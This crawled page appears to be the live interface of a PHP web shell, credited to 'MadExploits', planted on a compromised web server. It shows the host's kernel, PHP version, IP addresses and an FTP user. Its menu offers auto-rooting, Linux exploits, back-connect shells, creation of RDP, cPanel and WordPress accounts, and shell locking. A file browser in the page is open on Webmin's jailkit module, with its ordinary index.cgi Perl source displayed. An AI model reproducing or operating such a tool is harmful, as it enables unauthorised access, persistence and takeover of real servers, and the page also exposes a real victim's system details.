Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
jailkit /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
LICENSE
34.32
KB
-rw-r--r--
README.md
62
B
-rw-r--r--
config
32
B
-rw-r--r--
config.info
61
B
-rw-r--r--
delete_jail.cgi
1.25
KB
-rwxr-xr-x
edit_jail.cgi
2.71
KB
-rwxr-xr-x
index.cgi
1022
B
-rwxr-xr-x
install-type
4
B
-rw-r--r--
install_check.pl
376
B
-rwxr-xr-x
jailkit-lib.pl
1
KB
-rwxr-xr-x
module.info
86
B
-rw-r--r--
save_jail.cgi
1.97
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl use warnings; use strict; our %text; require './jailkit-lib.pl'; my $jk_init_ini = get_jk_init_ini(); my @sections = $jk_init_ini->Sections(); ui_print_header(undef, $text{'index_title'}, "", "index", 1, 1, 0, undef, undef, undef, undef); my @table; foreach my $jail (@sections) { push(@table, [ { 'type' => 'checkbox', 'name' => 'd', 'value' => $jail }, "<a href=\"edit_jail.cgi?jail=$jail\">".&html_escape($jail)."</a>", $jk_init_ini->val("$jail", 'comment') ]); } my @buttons; push(@buttons, [ [ "delete", $text{'index_delete_jail'} ] ]); my @actions; push(@actions, [ [ "edit_jail.cgi?new=1", $text{'index_create_jail'} ] ]); #use Data::Dumper; #print "<!-- " . Dumper(@table) . " -->\n"; print ui_form_columns_table( 'delete_jail.cgi', @buttons, 1, @actions, undef, [ $text{'index_delete'}, $text{'index_jail_id'}, $text{'index_comment'} ], undef, \@table, undef, 1, $text{'index_jail_list'}, $text{'index_no_jails'} ); ui_print_footer("");
Close